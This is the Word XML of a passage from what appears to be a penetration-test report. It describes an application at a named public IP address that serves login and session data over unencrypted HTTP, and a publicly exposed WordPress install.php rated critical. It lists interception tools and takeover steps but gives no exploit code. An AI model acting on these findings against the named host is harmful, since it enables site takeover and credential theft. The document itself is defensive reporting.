              <w:t xml:space="preserve">The application hosted on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>http://185.218.124.165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>http://185.218.124.165:8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> is only available via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>unencrypted HTTP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, without any support for HTTPS/TLS. This means that all communication between the user and the server is transmitted in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>plain text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>, including:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Login credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Session cookies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Personal information</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Search queries and other input data</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">This opens the door for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Man-in-the-Middle (MITM)</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> attacks, especially in public networks (Wi-Fi hotspots, etc.).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="HorizontalLine"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Location:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>http://185.218.124.165</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">  and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>:8080</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Port:</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 80 (standard HTTP), 8080 (custom HTTP, also unencrypted)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Attack Vector:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="1414" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>An attacker positioned in the same network (e.g., on public Wi-Fi or via ARP spoofing) can intercept and manipulate the traffic.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="1414" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Using tools like Wireshark, mitmproxy, or ettercap, the attacker can capture usernames, passwords, or inject malicious content.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Recommended Fix:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="1414" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Enable HTTPS with a valid SSL/TLS certificate (e.g., via Let's Encrypt).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="1414" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Force HTTPS redirect for all endpoints.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="1414" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Disable access to port 80 if not needed.</w:t>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tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Screenshots:</w:t>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drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="97">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6482715" cy="3158490"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>
                  <wp:docPr id="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 descr=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6482715" cy="3158490"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>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drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="95">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6482715" cy="3615055"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>
                  <wp:docPr id="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 descr=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6482715" cy="3615055"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>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tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability 5</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af"/>
        <w:tblW w:w="10425" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10425"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Description: WordPress CMS in Uninitialized State → RISK: Critical</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">The application at </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>http://185.218.124.165:8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> is publicly exposing the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>wp-admin/install.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> script, meaning that </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>WordPress has not been set up yet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> and is accepting arbitrary initial configuration from anyone.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>This allows an attacker to:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Take full control of the website by creating the first admin account;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Abuse the CMS to upload malicious content, backdoors or escalate into the server;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Leverage this to persist or pivot in the environment;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:ind w:left="707" w:hanging="283"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Execute a supply-chain attack by installing rogue plugins or themes.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>http://185.218.124.165:8080/wp-admin/install.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10425" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TextBody"/>
              <w:widowControl w:val="false"/>
              <w:suppressAutoHyphens w:val="true"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="StrongEmphasis"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Risk Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Normaltextrun"/>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>: 10/10 – No authentication, complete site compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
